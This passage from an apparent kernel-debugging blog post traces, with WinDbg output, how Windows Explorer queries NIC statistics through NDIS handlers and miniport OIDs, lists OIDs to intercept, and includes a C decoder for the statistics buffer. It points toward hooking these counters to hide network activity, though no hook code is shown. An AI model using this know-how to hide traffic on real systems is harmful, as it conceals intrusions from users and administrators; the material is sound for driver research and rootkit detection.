<div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">kd> !drvobj \driver\vmxnet 7</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">Driver object (81862f38) is for:</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">*** ERROR: Module load completed but symbols could not be loaded for vmxnet.sys</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">\Driver\vmxnet</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">Driver Extension List: (id , addr)</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">(4e4d4944 8197a600) </span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">Device Object list:</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">818627e0 </span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><br />
</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">DriverEntry: f9cc2685 vmxnet</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">DriverStartIo: 00000000 </span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">DriverUnload: f96cb89b NDIS!ndisMUnload</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">AddDevice: f96c75b4 NDIS!ndisPnPAddDevice</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><br />
</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">Dispatch routines:</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[00] IRP_MJ_CREATE f96bae6b NDIS!ndisCreateIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[01] IRP_MJ_CREATE_NAMED_PIPE f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[02] IRP_MJ_CLOSE f96bad9c NDIS!ndisCloseIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[03] IRP_MJ_READ f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[04] IRP_MJ_WRITE f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[05] IRP_MJ_QUERY_INFORMATION f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[06] IRP_MJ_SET_INFORMATION f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[07] IRP_MJ_QUERY_EA f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[08] IRP_MJ_SET_EA f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[09] IRP_MJ_FLUSH_BUFFERS f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span 
style="font-size: x-small;">[0a] IRP_MJ_QUERY_VOLUME_INFORMATION f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[0b] IRP_MJ_SET_VOLUME_INFORMATION f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[0c] IRP_MJ_DIRECTORY_CONTROL f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[0d] IRP_MJ_FILE_SYSTEM_CONTROL f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>[0e] IRP_MJ_DEVICE_CONTROL f96c1010 NDIS!ndisDeviceControlIrpHandler</b></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[10] IRP_MJ_SHUTDOWN f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[11] IRP_MJ_LOCK_CONTROL f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[12] IRP_MJ_CLEANUP f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[13] IRP_MJ_CREATE_MAILSLOT f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[14] IRP_MJ_QUERY_SECURITY f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier 
New",Courier,monospace;"><span style="font-size: x-small;">[15] IRP_MJ_SET_SECURITY f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[16] IRP_MJ_POWER f96ce877 NDIS!ndisPowerDispatch</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[17] IRP_MJ_SYSTEM_CONTROL f96c1415 NDIS!ndisWMIDispatch</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[18] IRP_MJ_DEVICE_CHANGE f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[19] IRP_MJ_QUERY_QUOTA f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[1a] IRP_MJ_SET_QUOTA f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[1b] IRP_MJ_PNP f96c3ab9 NDIS!ndisPnPDispatch</span></div><br />
<br />
<i>Case (ii)&(iii)</i>:<br />
<br />
<div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">kd> bp NDIS!ndisDeviceControlIrpHandler ".echo ====NdisDeviceControlIrpHandler breakpoint hit====\n;.echo IoControlCode>\n;dd poi(poi(esp+8)+60)+c l1\n;.echo OutputBufferLength>\n;dd poi(poi(esp+8)+60)+4 l1\n;.echo OutputBuffer>\n;dd poi(poi(poi(esp+8)+4)+10)+86c l3d\n;.echo InputBufferLength>\n;dd poi(poi(esp+8)+60)+8 l1\n;.echo InputBuffer>\n;dd poi(poi(esp+8)+c)\n;"</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">kd> g</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">Breakpoint 3 hit</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">====NdisDeviceControlIrpHandler breakpoint hit====</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">IoControlCode></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">8155a2f8 0017003e</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">OutputBufferLength:></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">8155a2f0 000002d0</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">OutputBuffer:></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f86c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f87c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier 
New",Courier,monospace;"><span style="font-size: x-small;">01a0f88c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f89c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8ac 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8bc 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8cc 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8dc 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8ec 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8fc 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f90c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f91c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f92c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f93c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier 
New",Courier,monospace;"><span style="font-size: x-small;">01a0f94c 00000000 00000000 00000002 00000002</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f95c 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">InputBufferLength:></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">8155a2f4 0000003c</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">InputBuffer:></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977300 00010107 80010104 80010114 00020101</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977310 00020102 00020103 00020104 80020208</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977320 80020201 80020207 80ffffff 80020213 </b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977330 80020214 80020215 80010202 f763b6a4</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977340 00060009 20646156 8168e170 8173ce20</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977350 00000000 00000000 816c8af8 07100002</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977360 817a12d0 e1be6290 fffffffc 40000000</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977370 0a050006 6e66744e 
001c0707 00000000</b></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">NDIS!ndisDeviceControlIrpHandler:<br />
f96c1010 8bff mov edi,edi<br />
kd> kb<br />
ChildEBP RetAddr Args to Child<br />
f763bc34 804edfe3 818627e0 8155a258 806d02d0 NDIS!ndisDeviceControlIrpHandler<br />
f763bc44 80573dce 8155a2ec 81731dd8 8155a258 nt!IopfCallDriver+0x31<br />
f763bc58 80574c5d 818627e0 8155a258 81731dd8 nt!IopSynchronousServiceTail+0x60<br />
f763bd00 8056d5ba 000001fc 00000000 00000000 nt!IopXxxControlFile+0x5e7<br />
f763bd34 8053ca28 000001fc 00000000 00000000 nt!NtDeviceIoControlFile+0x2a<br />
f763bd34 7c90eb94 000001fc 00000000 00000000 nt!KiFastCallEntry+0xf8<br />
01a0f7b8 7c90d8ef 7c801671 000001fc 00000000 ntdll!KiFastSystemCallRet<br />
01a0f7bc 7c801671 000001fc 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc<br />
01a0f81c 76468375 000001fc 0017003e 76477d3c kernel32!DeviceIoControl+0xdd<br />
01a0fb40 7645f5c7 000f6d94 01a0fb5c 01a0fc08 NETSHELL!NdisQueryStatistics+0x88<br />
01a0fbc8 76460d32 01a0fbe4 01a0fc08 001622a0 NETSHELL!CLanStatEngine::HrUpdateData+0x37<br />
01a0fbec 7645d7a4 000f6d00 01a0fc08 01a0fc8c NETSHELL!CNetStatisticsEngine::UpdateStatistics+0x2d<br />
01a0fc10 7645e7eb 00165dd4 7645e7b5 00134bf8 NETSHELL!CNetStatisticsCentral::RefreshStatistics+0x4e<br />
01a0fc24 7e418734 00000000 00000113 00007ff4 NETSHELL!CNetStatisticsCentral::TimerCallback+0x36<br />
01a0fc50 7e419857 7645e7b5 00000000 00000113 USER32!InternalCallWinProc+0x28<br />
01a0fcb8 7e419791 00000000 7645e7b5 00000000 USER32!UserCallWinProc+0xf3<br />
01a0fd10 7e418a10 01a0fd68 00000000 01a0fd8c USER32!DispatchMessageWorker+0x10e<br />
01a0fd20 7628155a 01a0fd68 00000000 76280000 USER32!DispatchMessageW+0xf<br />
01a0fd8c 76283746 76280000 00000000 000100c8 stobject!SysTrayMain+0x177<br />
01a0ffb4 7c80b683 00000000 00000000 00000000 stobject!CSysTray::SysTrayThreadProc+0x4f</span></div></blockquote></blockquote><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggmFsTswic8tE4RMOP-WlHH8bzwINhbNH8vGVV9dnkOUB63hdKYXbEeIa8h9qDK0md0ypN292-yfDs4F5oAlmLX0otdXW2FGS1nqElfRJn04lxAggghlkQK87Nw1pFwhNA20Rl4KXwUSeZ/s1600/diagram_explorer_retrieve_network_stats_from_nic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggmFsTswic8tE4RMOP-WlHH8bzwINhbNH8vGVV9dnkOUB63hdKYXbEeIa8h9qDK0md0ypN292-yfDs4F5oAlmLX0otdXW2FGS1nqElfRJn04lxAggghlkQK87Nw1pFwhNA20Rl4KXwUSeZ/s640/diagram_explorer_retrieve_network_stats_from_nic.png" width="452" /></a></div><div style="text-align: center;"><u>Diagram: how Explorer retrieves network statistics from the NIC</u></div><div style="text-align: left;"><u><br />
</u></div><ol start="3"><li>NdisQueryStatisticsOids</li>
<ul><li>What this function basically does is:</li>
</ul><ol><ol type="i"><li>Check the request info passed in <b>InputBuffer</b>; these are OIDs, that is, the constants that specify the codes of the NDIS requests.</li>
</ol></ol></ol><blockquote><blockquote><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">#define OID_GEN_MEDIA_IN_USE 0x00010104<br />
#define OID_GEN_MEDIA_CONNECT_STATUS 0x00010114<br />
#define OID_GEN_PHYSICAL_MEDIUM 0x00010202<br />
#define OID_GEN_XMIT_OK 0x00020101<br />
#define OID_GEN_RCV_OK 0x00020102<br />
#define OID_GEN_XMIT_ERROR 0x00020103<br />
#define OID_GEN_RCV_ERROR 0x00020104<br />
#define OID_GEN_DIRECTED_BYTES_XMIT 0x00020201<br />
#define OID_GEN_DIRECTED_BYTES_RCV 0x00020207<br />
#define OID_GEN_DIRECTED_FRAMES_RCV 0x00020208<br />
#define OID_GEN_INIT_TIME_MS 0x00020213<br />
#define OID_GEN_RESET_COUNTS 0x00020214<br />
#define OID_GEN_MEDIA_SENSE_COUNTS 0x00020215</span></div></blockquote></blockquote><ul><ul><li>The output will be stored in <b>OutputBuffer</b> and should look like this:</li>
</ul></ul><blockquote><blockquote><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f86c 00010107 00000004 00989680 80010104<br />
01a0f87c 00000004 00000000 80010114 00000004<br />
01a0f88c 00000000 00020101 00000008 00000083<br />
01a0f89c 00000000 00020102 00000008 000001d6<br />
01a0f8ac 00000000 00020103 00000004 00000000<br />
01a0f8bc 00020104 00000004 00000000 80020208<br />
01a0f8cc 00000008 00000016 00000000 80020201<br />
01a0f8dc 00000008 00002253 00000000 80020207<br />
01a0f8ec 00000008 0000bd9d 00000000 80ffffff<br />
01a0f8fc 00000004 00000588 80020213 00000004<br />
01a0f90c 0000000f 80020214 00000004 00000000<br />
01a0f91c 80020215 00000004 00000000 80010202<br />
01a0f92c 00000004 00000000 00000000 00000000<br />
01a0f93c 00000000 00000000 00000000 00000000<br />
01a0f94c 00000000 00000000 00000002 00000002</span></div></blockquote></blockquote><br />
<br />
Each entry in the output has the structure <i>[[Request_OID][Output_Length][Output]]</i>, where <i>Output</i> occupies <i>Output_Length</i> bytes (4 or 8 in the dump above).<br />
<br />
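As an added example (not code from the original post), the following C program decodes a copy of the OutputBuffer dump above using the [Request_OID][Output_Length][Output] record layout just described. It assumes little-endian x86 memory, that a zero OID marks the end of the filled records, and that the top bit seen on some OIDs in the dump (80010104 and so on) can be ignored when matching OIDs; the post does not document that bit, and OID_GEN_LINK_SPEED (0x00010107, the first record) is taken from the NDIS headers rather than from the post's list.

```c
/* Added example, not from the original post: decode the OutputBuffer that
 * NDIS!ndisQueryStatisticsOids fills for NETSHELL, record by record, using the
 * layout the post gives: [Request_OID][Output_Length][Output] (4 or 8 bytes). */
#include <stddef.h>
#include <stdint.h>

/* OID codes from the post's #define list, plus OID_GEN_LINK_SPEED (standard
 * NDIS code, not in the post's list) for the first record in the dump. */
#define OID_GEN_LINK_SPEED            0x00010107
#define OID_GEN_MEDIA_IN_USE          0x00010104
#define OID_GEN_MEDIA_CONNECT_STATUS  0x00010114
#define OID_GEN_PHYSICAL_MEDIUM       0x00010202
#define OID_GEN_XMIT_OK               0x00020101
#define OID_GEN_RCV_OK                0x00020102
#define OID_GEN_XMIT_ERROR            0x00020103
#define OID_GEN_RCV_ERROR             0x00020104
#define OID_GEN_DIRECTED_BYTES_XMIT   0x00020201
#define OID_GEN_DIRECTED_BYTES_RCV    0x00020207
#define OID_GEN_DIRECTED_FRAMES_RCV   0x00020208
#define OID_GEN_INIT_TIME_MS          0x00020213
#define OID_GEN_RESET_COUNTS          0x00020214
#define OID_GEN_MEDIA_SENSE_COUNTS    0x00020215
/* Some OIDs in the dump carry bit 31 (e.g. 80010104). The post does not say
 * what it means; this example assumes a flag and ignores it when matching. */
#define OID_HIGH_BIT 0x80000000u

typedef struct {
    uint32_t oid;     /* Request_OID exactly as stored in the buffer */
    uint32_t length;  /* Output_Length in bytes */
    uint64_t value;   /* Output, little-endian dwords joined */
} stat_record_t;

/* Walk the records in buf (ndwords dwords). Returns the number of records
 * parsed, or -1 on a malformed record (bad length, truncated value, no room).
 * Stops at an OID of 0, which is where the dump's filled area ends. */
int parse_stat_records(const uint32_t *buf, size_t ndwords,
                       stat_record_t *out, size_t max_out)
{
    size_t i = 0;
    int n = 0;
    while (i < ndwords && buf[i] != 0) {
        if (i + 2 > ndwords)
            return -1;                 /* OID without a length dword */
        uint32_t len = buf[i + 1];
        if (len != 4 && len != 8)
            return -1;                 /* only the sizes this format uses */
        size_t vdwords = len / 4;
        if (i + 2 + vdwords > ndwords || (size_t)n >= max_out)
            return -1;
        uint64_t value = buf[i + 2];
        if (vdwords == 2)
            value |= (uint64_t)buf[i + 3] << 32;
        out[n].oid = buf[i];
        out[n].length = len;
        out[n].value = value;
        n++;
        i += 2 + vdwords;
    }
    return n;
}

/* Dwords of the post's OutputBuffer dump (address column removed). */
static const uint32_t kSampleDump[] = {
    0x00010107, 0x00000004, 0x00989680, 0x80010104, 0x00000004, 0x00000000,
    0x80010114, 0x00000004, 0x00000000, 0x00020101, 0x00000008, 0x00000083,
    0x00000000, 0x00020102, 0x00000008, 0x000001d6, 0x00000000, 0x00020103,
    0x00000004, 0x00000000, 0x00020104, 0x00000004, 0x00000000, 0x80020208,
    0x00000008, 0x00000016, 0x00000000, 0x80020201, 0x00000008, 0x00002253,
    0x00000000, 0x80020207, 0x00000008, 0x0000bd9d, 0x00000000, 0x80ffffff,
    0x00000004, 0x00000588, 0x80020213, 0x00000004, 0x0000000f, 0x80020214,
    0x00000004, 0x00000000, 0x80020215, 0x00000004, 0x00000000, 0x80010202,
    0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000002, 0x00000002,
};
#define SAMPLE_DWORDS (sizeof kSampleDump / sizeof kSampleDump[0])

/* Number of records in the sample dump (-1 if it does not parse). */
int sample_record_count(void)
{
    stat_record_t recs[32];
    return parse_stat_records(kSampleDump, SAMPLE_DWORDS, recs, 32);
}

/* Counter the sample dump reports for oid (high bit ignored), or -1 if absent. */
int64_t sample_stat_value(uint32_t oid)
{
    stat_record_t recs[32];
    int n = parse_stat_records(kSampleDump, SAMPLE_DWORDS, recs, 32);
    for (int k = 0; k < n; k++)
        if ((recs[k].oid & ~OID_HIGH_BIT) == (oid & ~OID_HIGH_BIT))
            return (int64_t)recs[k].value;
    return -1;
}
```

The dump decodes to 15 records; XMIT_OK is 0x83 (131 frames) and RCV_OK is 0x1d6 (470 frames), which are exactly the counters a statistics-hiding hook in this path would alter.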
<ul><ul><li>Call <b>NDIS!NdisMDispatchRequest</b>, which then calls the handler function that passes the request on to the NIC driver. The handler function is stored in one of the members of <b>NDIS_MINIPORT_CHARACTERISTICS</b>.</li>
</ul></ul><ol start="4"><li>QueryInformationHandler</li>
<ol type="i"><li>One of the handler functions stored in <b>NDIS_MINIPORT_CHARACTERISTICS</b></li>
<li>It specifies the entry point of the caller's <b>MiniportQueryInformation</b> function</li>
<li>In order to find the <b>MiniportQueryInformation</b> address registered by the miniport driver (<b>\driver\vmxnet </b>in this case):<br />
<br />
<span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">kd> !drvobj \driver\vmxnet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Driver object (81862f38) is for:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> \Driver\vmxnet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Driver Extension List: (id , addr)</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> (4e4d4944 8197a600) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Device Object list:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 818627e0 </span></span></li>
<li>DriverObjectExtension = 8197a600, allocated by the <b>IoAllocateDriverObjectExtension</b> call within the ndis.sys export function <b>NdisRegisterMiniportDriver</b>.</li>
<li>DriverObjectExtension is a driver-specific structure; in this case the structure is called <b>NDIS_M_DRIVER_BLOCK</b> and stores the NDIS miniport driver information: </li>
</ol></ol><blockquote style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">NDIS!_NDIS_M_DRIVER_BLOCK<br />
 +0x000 NextDriver : Ptr32 _NDIS_M_DRIVER_BLOCK<br />
 +0x004 MiniportQueue : Ptr32 _NDIS_MINIPORT_BLOCK<br />
 +0x008 NdisDriverInfo : Ptr32 _NDIS_WRAPPER_HANDLE<br />
 +0x00c AssociatedProtocol : Ptr32 _NDIS_PROTOCOL_BLOCK<br />
 +0x010 DeviceList : _LIST_ENTRY<br />
 +0x018 PendingDeviceList : Ptr32 _NDIS_PENDING_IM_INSTANCE<br />
 +0x01c UnloadHandler : Ptr32 void<br />
 +0x020 MiniportCharacteristics : _NDIS51_MINIPORT_CHARACTERISTICS<br />
 +0x09c MiniportsRemovedEvent : _KEVENT<br />
 +0x0ac Ref : _REFERENCE<br />
 +0x0b4 Flags : Uint2B<br />
 +0x0b8 IMStartRemoveMutex : _KMUTANT<br />
 +0x0d8 DriverVersion : Uint4B<br />
<br />
 kd> dt _NDIS51_MINIPORT_CHARACTERISTICS 817dfb50+20<br />
 NDIS!_NDIS51_MINIPORT_CHARACTERISTICS<br />
 +0x000 MajorNdisVersion : 0x5 ''<br />
 +0x001 MinorNdisVersion : 0 ''<br />
 +0x002 Filler : 0<br />
 +0x004 Reserved : 0<br />
 +0x008 CheckForHangHandler : 0xf9cc5822 unsigned char +0<br />
 +0x00c DisableInterruptHandler : (null)<br />
 +0x010 EnableInterruptHandler : (null)<br />
 +0x014 HaltHandler : 0xf9cc73a6 void +0<br />
 <span style="color: lime;">+0x018 HandleInterruptHandler : 0xf9cc6eec void +0</span><br />
 +0x01c InitializeHandler : 0xf9cc676c int +0<br />
 +0x020 ISRHandler : 0xf9cc5678 void +0<br />
 <span style="color: lime;">+0x024 QueryInformationHandler : 0xf9cc5b58 int +0</span><br />
 +0x028 ReconfigureHandler : (null)<br />
 +0x02c ResetHandler : 0xf9cc589e int +0<br />
 +0x030 SendHandler : (null)<br />
 +0x030 WanSendHandler : (null)<br />
 +0x034 SetInformationHandler : 0xf9cc7448 int +0<br />
 +0x038 TransferDataHandler : (null)<br />
 +0x038 WanTransferDataHandler : (null)<br />
 +0x03c ReturnPacketHandler : 0xf9cc57e6 void +0<br />
 +0x040 SendPacketsHandler : 0xf9cc7662 void +0<br />
 +0x044 AllocateCompleteHandler : (null)<br />
 +0x048 CoCreateVcHandler : (null)<br />
 +0x04c CoDeleteVcHandler : (null)<br />
 +0x050 CoActivateVcHandler : (null)<br />
 +0x054 CoDeactivateVcHandler : (null)<br />
 +0x058 CoSendPacketsHandler : (null)<br />
 +0x05c CoRequestHandler : (null)<br />
 +0x060 CancelSendPacketsHandler : (null)<br />
 +0x064 PnPEventNotifyHandler : (null)<br />
 +0x068 AdapterShutdownHandler : (null)<br />
 +0x06c Reserved1 : (null)<br />
 +0x070 Reserved2 : (null)<br />
 +0x074 Reserved3 : (null)<br />
 +0x078 Reserved4 : (null)</span></blockquote><br />
We intercept the following OIDs:<br />
<br />
<blockquote style="color: blue; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">#define OID_GEN_MEDIA_IN_USE 0x00010104</span><br />
<span style="font-size: x-small;">#define OID_GEN_MEDIA_CONNECT_STATUS 0x00010114</span><br />
<span style="font-size: x-small;">#define OID_GEN_PHYSICAL_MEDIUM 0x00010202</span><br />
<span style="font-size: x-small;">#define OID_GEN_XMIT_OK 0x00020101</span><br />
<span style="font-size: x-small;">#define OID_GEN_RCV_OK 0x00020102</span><br />
<span style="font-size: x-small;">#define OID_GEN_XMIT_ERROR 0x00020103</span><br />
<span style="font-size: x-small;">#define OID_GEN_RCV_ERROR 0x00020104</span><br />
<span style="font-size: x-small;">#define OID_GEN_DIRECTED_BYTES_XMIT 0x00020201</span><br />
<span style="font-size: x-small;">#define OID_GEN_DIRECTED_BYTES_RCV 0x00020207</span><br />
<span style="font-size: x-small;">#define OID_GEN_DIRECTED_FRAMES_RCV 0x00020208 </span><br />
<span style="font-size: x-small;">#define OID_GEN_INIT_TIME_MS 0x00020213</span><br />
<span style="font-size: x-small;">#define OID_GEN_RESET_COUNTS 0x00020214</span><br />
<span style="font-size: x-small;">#define OID_GEN_MEDIA_SENSE_COUNTS 0x00020215 </span></blockquote><br />
<span style="color: blue; font-size: x-large;">Extra Note</span><br />
<br />
<div style="color: black;"><span style="font-size: small;">In Vista (or above), NDIS uses <b>NDIS_MINIPORT_DRIVER_CHARACTERISTICS.OidRequestHandler</b> (similar to <b>QueryInformationHandler</b>). For example, Vista running in VMware uses the Intel PRO/100 Network Interface Card:</span></div><div style="color: black;"><br />
</div><ul style="color: black;"><li><span style="font-size: large;"><span style="font-size: small;">NIC Driver (\Driver\E1G60) -> <b>E1G60I32!E1000Request</b>(NDIS_HANDLE MiniportAdapterContext, PNDIS_OID_REQUEST NdisRequest) </span></span></li>
</ul><blockquote style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">kd> g<br />
E1G60I32!E1000Request:<br />
892b1046 8bff mov edi,edi<br />
<br />
kd> dd esp<br />
9bcfa6d4 85ccd3a4 8509b008 8948c1a8 85367868<br />
[MiniportAdapterContext][NdisRequest]<br />
<br />
kd> dd 8948c1a8 <span style="color: lime;">//PNDIS_OID_REQUEST</span><br />
8948c1a8 008c0196 00000002 00000000 00000000<br />
8948c1b8 00000000 00000000 00020102 838335d8<br />
8948c1c8 00000008 00000000 00000000 00000000<br />
8948c1d8 00000000 00000000 85367ac0 85367ac0<br />
<br />
typedef struct _NDIS_OID_REQUEST<br />
{<br />
//<br />
// Caller must set Header to<br />
// Header.Type = NDIS_OBJECT_TYPE_OID_REQUEST<br />
// Header.Revision = NDIS_OID_REQUEST_REVISION_1<br />
